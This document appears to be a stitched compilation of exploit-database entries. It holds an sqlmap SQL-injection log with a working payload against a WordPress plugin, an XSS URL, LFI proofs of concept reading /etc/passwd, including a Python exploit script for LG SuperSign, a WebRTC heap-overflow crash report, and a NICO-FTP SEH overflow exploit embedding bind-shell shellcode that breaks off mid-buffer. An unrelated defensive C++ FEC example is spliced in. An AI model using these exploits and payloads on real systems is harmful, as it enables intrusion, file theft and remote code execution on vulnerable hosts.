Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http]


(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http]
---
[11:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47'

[*] shutting down at 11:50:08


CVE-2018-1002001

http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
            
# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/localize-my-post/
# CVE: 2018-16299

# DESCRIPTION
# This bug was found in the file: /localize-my-post/ajax/include.php
# include($_REQUEST['file']);
# The parameter "file" is not sanitized, allowing local files to be included.
# To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.

# Local File Inclusion POC:

GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
            
There is an out-of-bounds read in FEC processing in WebRTC. If a very short RTP packet is received, FEC will assume the packet is longer and process data outside of the allocated buffer.

This bug causes the following ASAN crash:

==109993==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b003b7ff70 at pc 0x55e01a250cd1 bp 0x7fa3af7abc40 sp 0x7fa3af7abc38
READ of size 1 at 0x61b003b7ff70 thread T15 (Chrome_libJingl)
    #0 0x55e01a250cd0 in XorPayloads third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34
    #1 0x55e01a250cd0 in webrtc::ForwardErrorCorrection::RecoverPacket(webrtc::ForwardErrorCorrection::ReceivedFecPacket const&, webrtc::ForwardErrorCorrection::RecoveredPacket*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:630
    #2 0x55e01a251162 in webrtc::ForwardErrorCorrection::AttemptRecovery(std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:652:12
    #3 0x55e01a251b12 in webrtc::ForwardErrorCorrection::DecodeFec(webrtc::ForwardErrorCorrection::ReceivedPacket const&, std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:739:3
    #4 0x55e01a4c5595 in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:248:11
    #5 0x55e01a4a1bb9 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:419:23
    #6 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5
    #7 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3
    #8 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11
    #9 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19
    #10 0x55e01a231339 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36
    #11 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10
    #12 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26
    #13 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc
    #14 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22
    #15 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22
    #16 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7
    #17 0x55e00d52b6f5 in Run base/callback.h:96:12
    #18 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
    #19 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25
    #20 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5
    #21 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373
    #22 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
    #23 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14
    #24 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3
    #25 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13
    #26 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)

0x61b003b7ff70 is located 0 bytes to the right of 1520-byte region [0x61b003b7f980,0x61b003b7ff70)
allocated by thread T15 (Chrome_libJingl) here:
    #0 0x55e00607ef92 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3
    #1 0x55e01a4c3eeb in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, unsigned char) third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:101:26
    #2 0x55e01a4a1b6f in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:414:27
    #3 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5
    #4 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3
    #5 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11
    #6 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19
    #7 0x55e01a231339 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36
    #8 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10
    #9 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26
    #10 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc
    #11 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22
    #12 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22
    #13 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7
    #14 0x55e00d52b6f5 in Run base/callback.h:96:12
    #15 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
    #16 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25
    #17 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5
    #18 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373
    #19 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
    #20 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14
    #21 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3
    #22 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13
    #23 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)

Thread T15 (Chrome_libJingl) created by T0 (chrome) here:
    #0 0x55e00603bb7d in __interceptor_pthread_create /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors.cc:210:3
    #1 0x55e00d73b99e in base::(anonymous namespace)::CreateThread(unsigned long, bool, base::PlatformThread::Delegate*, base::PlatformThreadHandle*, base::ThreadPriority) base/threading/platform_thread_posix.cc:115:13
    #2 0x55e00d686be9 in base::Thread::StartWithOptions(base::Thread::Options const&) base/threading/thread.cc:112:15
    #3 0x55e00d68684b in base::Thread::Start() base/threading/thread.cc:75:10
    #4 0x55e01a09ba37 in content::PeerConnectionDependencyFactory::CreatePeerConnectionFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:177:3
    #5 0x55e01a09b4d0 in content::PeerConnectionDependencyFactory::GetPcFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:139:5
    #6 0x55e01a09df09 in content::PeerConnectionDependencyFactory::CreatePeerConnection(webrtc::PeerConnectionInterface::RTCConfiguration const&, blink::WebLocalFrame*, webrtc::PeerConnectionObserver*) content/renderer/media/webrtc/peer_connection_dependency_factory.cc:340:8
    #7 0x55e01aa63b1b in content::RTCPeerConnectionHandler::Initialize(blink::WebRTCConfiguration const&, blink::WebMediaConstraints const&) content/renderer/media/webrtc/rtc_peer_connection_handler.cc:1333:50
    #8 0x55e01baafde2 in blink::RTCPeerConnection::RTCPeerConnection(blink::ExecutionContext*, blink::WebRTCConfiguration const&, blink::WebMediaConstraints, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:585:23
    #9 0x55e01baaaedc in blink::RTCPeerConnection::Create(blink::ExecutionContext*, blink::RTCConfiguration const&, blink::Dictionary const&, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:518:44
    #10 0x55e01bb1ad0b in constructor gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1317:29
    #11 0x55e01bb1ad0b in blink::V8RTCPeerConnection::constructorCallback(v8::FunctionCallbackInfo<v8::Value> const&) gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1667
    #12 0x55e00ab4db49 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo*) v8/src/api-arguments-inl.h:94:3
    #13 0x55e00ab4a4c4 in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<true>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) v8/src/builtins/builtins-api.cc:109:36
    #14 0x55e00ab48eb3 in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) v8/src/builtins/builtins-api.cc:135:5
    #15 0x55e00c2fce0d  (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xde74e0d)
    #16 0x55e00c263d3f  (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbd3f)
    #17 0x7e9c7b70dd69  (<unknown module>)
    #18 0x7e9c7b68868f  (<unknown module>)
    #19 0x55e00c2618a5  (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)
    #20 0x55e00c263c60  (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbc60)
    #21 0x7e9c7b70dd69  (<unknown module>)
    #22 0x7e9c7b68868f  (<unknown module>)
    #23 0x7e9c7b68868f  (<unknown module>)
    #24 0x7e9c7b68868f  (<unknown module>)
    #25 0x55e00c2618a5  (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)
    #26 0x55e00c265722  (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddd722)
    #27 0x7e9c7b684820  (<unknown module>)
    #28 0x55e00b3b4130 in Call v8/src/simulator.h:113:12
    #29 0x55e00b3b4130 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) v8/src/execution.cc:155
    #30 0x55e00b3b3993 in CallInternal v8/src/execution.cc:191:10
    #31 0x55e00b3b3993 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) v8/src/execution.cc:202
    #32 0x55e00aa107b4 in v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) v8/src/api.cc:5218:7
    #33 0x55e015fe0a61 in blink::V8ScriptRunner::CallFunction(v8::Local<v8::Function>, blink::ExecutionContext*, v8::Local<v8::Value>, int, v8::Local<v8::Value>*, v8::Isolate*) third_party/blink/renderer/bindings/core/v8/v8_script_runner.cc:386:17
    #34 0x55e016028398 in blink::V8EventListener::CallListenerFunction(blink::ScriptState*, v8::Local<v8::Value>, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_event_listener.cc:115:8
    #35 0x55e016029a54 in blink::V8AbstractEventListener::InvokeEventHandler(blink::ScriptState*, blink::Event*, v8::Local<v8::Value>) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:171:20
    #36 0x55e01602942b in blink::V8AbstractEventListener::HandleEvent(blink::ScriptState*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:120:3
    #37 0x55e016029103 in blink::V8AbstractEventListener::handleEvent(blink::ExecutionContext*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:108:3
    #38 0x55e017446ebe in blink::EventTarget::FireEventListeners(blink::Event*, blink::EventTargetData*, blink::HeapVector<blink::RegisteredEventListener, 1ul>&) third_party/blink/renderer/core/dom/events/event_target.cc:804:15
    #39 0x55e017445121 in blink::EventTarget::FireEventListeners(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:656:29
    #40 0x55e017444d5b in blink::EventTarget::DispatchEventInternal(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:560:41
    #41 0x55e017a0de87 in Create third_party/blink/renderer/core/events/progress_event.h:44:16
    #42 0x55e017a0de87 in blink::FileReader::FireEvent(WTF::AtomicString const&) third_party/blink/renderer/core/fileapi/file_reader.cc:471
    #43 0x55e017a0e6d4 in blink::FileReader::DidFinishLoading() third_party/blink/renderer/core/fileapi/file_reader.cc:427:3
    #44 0x55e00a9494ef in blink::mojom::blink::BlobReaderClientStubDispatch::Accept(blink::mojom::blink::BlobReaderClient*, mojo::Message*) gen/third_party/blink/public/mojom/blob/blob.mojom-blink.cc:168:13
    #45 0x55e00ea14f7e in mojo::InterfaceEndpointClient::HandleValidatedMessage(mojo::Message*) mojo/public/cpp/bindings/lib/interface_endpoint_client.cc:419:32
    #46 0x55e00ea258b3 in mojo::internal::MultiplexRouter::ProcessIncomingMessage(mojo::internal::MultiplexRouter::MessageWrapper*, mojo::internal::MultiplexRouter::ClientCallBehavior, base::SequencedTaskRunner*) mojo/public/cpp/bindings/lib/multiplex_router.cc:865:42
    #47 0x55e00ea2409e in mojo::internal::MultiplexRouter::Accept(mojo::Message*) mojo/public/cpp/bindings/lib/multiplex_router.cc:589:38
    #48 0x55e00ea0efa7 in mojo::Connector::ReadSingleMessage(unsigned int*) mojo/public/cpp/bindings/lib/connector.cc:443:51
    #49 0x55e00ea1081c in mojo::Connector::ReadAllAvailableMessages() mojo/public/cpp/bindings/lib/connector.cc:472:10
    #50 0x55e00ea00642 in Run base/callback.h:125:12
    #51 0x55e00ea00642 in mojo::SimpleWatcher::OnHandleReady(int, unsigned int, mojo::HandleSignalsState const&) mojo/public/cpp/system/simple_watcher.cc:274
    #52 0x55e00d52b6f5 in Run base/callback.h:96:12
    #53 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
    #54 0x55e00c4afc95 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) third_party/blink/renderer/platform/scheduler/base/thread_controller_impl.cc:166:21
    #55 0x55e00d52b6f5 in Run base/callback.h:96:12
    #56 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
    #57 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25
    #58 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5
    #59 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373
    #60 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
    #61 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14
    #62 0x55e01bfb0599 in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:218:23
    #63 0x55e00cafbca5 in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:567:14
    #64 0x55e00caff751 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner_impl.cc:969:10
    #65 0x55e00cb1e6c3 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:459:29
    #66 0x55e00cafa2d0 in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
    #67 0x55e006081fe3 in ChromeMain chrome/app/chrome_main.cc:101:12
    #68 0x7fa3ceac32b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)

SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34 in XorPayloads
Shadow bytes around the buggy address:
  0x0c3680767f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3680767fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3680767fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3680767fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3680767fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3680767fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa
  0x0c3680767ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3680768000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c3680768010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3680768020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3680768030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==109993==ABORTING

To reproduce this issue:

1) Apply new.patch to a fresh WebRTC tree
2) Build video_replay
3) Download the attached files and run ./video_replay --input_file fec


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45444.zip
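The recovery step described above, as an added example that is not WebRTC's code: a reduced model of ULPFEC XOR recovery (RFC 5109 style, with a length-recovery field) in which every XOR is bounded by the real size of the packet it reads from, so a very short source packet contributes zeros instead of driving a read past its buffer. The namespace, function names and sample packets (fec_model, BuildFec, Recover, XorInto, kSrcA..kSrcC) are constructed for this example.

```cpp
// Added example, not WebRTC's code: a reduced model of ULPFEC XOR recovery.
// A FEC packet protects a group of source packets over `protection_len`
// bytes; a lost source packet is the XOR of the FEC payload with every
// source packet that did arrive. Source packets shorter than protection_len
// count as zero-padded, so the loop must never read past their real size.
#include <algorithm>
#include <cstddef>
#include <cstdint>
#include <vector>

namespace fec_model {

using Bytes = std::vector<uint8_t>;

struct FecPacket {
  uint16_t length_recovery;  // XOR of the protected packets' lengths
  Bytes payload;             // XOR of the protected payloads, zero-padded
};

struct RecoverResult {
  bool ok;        // false: inputs inconsistent, nothing recovered
  Bytes payload;  // the recovered source packet when ok
};

// XOR `src` into `dst`, bounded by the real size of both buffers and by
// protection_len. Bytes beyond the end of a shorter src are zero under the
// scheme and leave dst unchanged, so the read index never reaches src.size().
// This bound is what the very-short-packet case above needs.
void XorInto(Bytes& dst, const Bytes& src, size_t protection_len) {
  const size_t n = std::min({dst.size(), src.size(), protection_len});
  for (size_t i = 0; i < n; ++i) dst[i] ^= src[i];
}

// Sender side, included so the example round-trips offline.
FecPacket BuildFec(const std::vector<Bytes>& sources, size_t protection_len) {
  FecPacket fec{0, Bytes(protection_len, 0)};
  for (const Bytes& src : sources) {
    fec.length_recovery ^= static_cast<uint16_t>(src.size());
    XorInto(fec.payload, src, protection_len);
  }
  return fec;
}

// Receiver side: recover the single missing source packet from the FEC
// packet and the sources that arrived. Rejects a FEC payload shorter than
// the protection length and a recovered length larger than it; both mean a
// malformed or hostile packet rather than a recoverable loss.
RecoverResult Recover(const FecPacket& fec, const std::vector<Bytes>& present,
                      size_t protection_len) {
  if (fec.payload.size() < protection_len) return {false, {}};
  Bytes out(fec.payload.begin(),
            fec.payload.begin() + static_cast<std::ptrdiff_t>(protection_len));
  uint16_t len = fec.length_recovery;
  for (const Bytes& src : present) {
    len ^= static_cast<uint16_t>(src.size());
    XorInto(out, src, protection_len);
  }
  if (len > protection_len) return {false, {}};
  out.resize(len);  // drop the zero padding the scheme adds
  return {true, out};
}

// Constructed sample group: three RTP-like payloads, one of them (kSrcB)
// much shorter than the protection length.
const Bytes kSrcA = {0x80, 0x60, 0x01, 0x02, 0x03, 0x04};
const Bytes kSrcB = {0x80, 0x60, 0xaa};
const Bytes kSrcC = {0x80, 0x61, 0x10, 0x20, 0x30};
constexpr size_t kProtectionLen = 6;

// Build FEC over all three sample packets, then recover the one indexed by
// `lost` from the other two.
RecoverResult RoundTrip(int lost) {
  const std::vector<Bytes> all = {kSrcA, kSrcB, kSrcC};
  FecPacket fec = BuildFec(all, kProtectionLen);
  std::vector<Bytes> present;
  for (int i = 0; i < 3; ++i) {
    if (i != lost) present.push_back(all[i]);
  }
  return Recover(fec, present, kProtectionLen);
}

}  // namespace fec_model
```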
            
# Exploit Title: LG SuperSign EZ CMS 2.5 - Local File Inclusion
# Date: 2018-09-13
# Exploit Author: Alejandro Fanjul
# Vendor Homepage: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSign EZ (CMS)
# Tested on: Web OS 4.0
# CVE : CVE-2018-16288

# More info: http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
# Any user can read files from the TV, without authentication due to an existing LFI in the following path:

# http://SuperSign_IP:9080/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

# PoC

import requests
from argparse import ArgumentParser

parser = ArgumentParser(description="SuperSign EZ CMS file read via LFI")
parser.add_argument("-t", "--target", dest="target",
                    help="target host with port, e.g. SuperSign_IP:9080")
parser.add_argument("-p", "--path", dest="filepath",
                    help="path to the file you want to read")

args = parser.parse_args()
path = args.filepath

# Same traversal sequence as the URL above; the requested path is appended to it.
s = requests.get('http://' + str(args.target).replace('\n', '') + '/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..' + str(path))
print(s.text)
            
# Exploit Title: NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)
# Author: Abdullah Alıç
# Date: 2018-09-04
# Software link: https://en.softonic.com/download/nico-ftp/windows/post-download
# Tested Version: 3.0.1.19
# Vulnerability Type: Buffer Overflow (SEH)
# Tested on OS: Windows XP Professional SP3 x86 eng

import socket
import sys
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 21))
s.listen(5)
        
#msfvenom -p windows/shell_bind_tcp  -b "\x00\x0a\x0d" -f python
#355 bytes
buf =  ""
buf += "\xba\xc6\xe4\x42\xd0\xd9\xea\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x53\x83\xc6\x04\x31\x56\x0e\x03\x90\xea\xa0"
buf += "\x25\xe0\x1b\xa6\xc6\x18\xdc\xc7\x4f\xfd\xed\xc7\x34"
buf += "\x76\x5d\xf8\x3f\xda\x52\x73\x6d\xce\xe1\xf1\xba\xe1"
buf += "\x42\xbf\x9c\xcc\x53\xec\xdd\x4f\xd0\xef\x31\xaf\xe9"
buf += "\x3f\x44\xae\x2e\x5d\xa5\xe2\xe7\x29\x18\x12\x83\x64"
buf += "\xa1\x99\xdf\x69\xa1\x7e\x97\x88\x80\xd1\xa3\xd2\x02"
buf += "\xd0\x60\x6f\x0b\xca\x65\x4a\xc5\x61\x5d\x20\xd4\xa3"
buf += "\xaf\xc9\x7b\x8a\x1f\x38\x85\xcb\x98\xa3\xf0\x25\xdb"
buf += "\x5e\x03\xf2\xa1\x84\x86\xe0\x02\x4e\x30\xcc\xb3\x83"
buf += "\xa7\x87\xb8\x68\xa3\xcf\xdc\x6f\x60\x64\xd8\xe4\x87"
buf += "\xaa\x68\xbe\xa3\x6e\x30\x64\xcd\x37\x9c\xcb\xf2\x27"
buf += "\x7f\xb3\x56\x2c\x92\xa0\xea\x6f\xfb\x05\xc7\x8f\xfb"
buf += "\x01\x50\xfc\xc9\x8e\xca\x6a\x62\x46\xd5\x6d\x85\x7d"
buf += "\xa1\xe1\x78\x7e\xd2\x28\xbf\x2a\x82\x42\x16\x53\x49"
buf += "\x92\x97\x86\xe4\x9a\x3e\x79\x1b\x67\x80\x29\x9b\xc7"
buf += "\x69\x20\x14\x38\x89\x4b\xfe\x51\x22\xb6\x01\x4c\xef"
buf += "\x3f\xe7\x04\x1f\x16\xbf\xb0\xdd\x4d\x08\x27\x1d\xa4"
buf += "\x20\xcf\x56\xae\xf7\xf0\x66\xe4\x5f\x66\xed\xeb\x5b"
buf += "\x97\xf2\x21\xcc\xc0\x65\xbf\x9d\xa3\x14\xc0\xb7\x53"
buf += "\xb4\x53\x5c\xa3\xb3\x4f\xcb\xf4\x94\xbe\x02\x90\x08"
buf += "\x98\xbc\x86\xd0\x7c\x86\x02\x0f\xbd\x09\x8b\xc2\xf9"
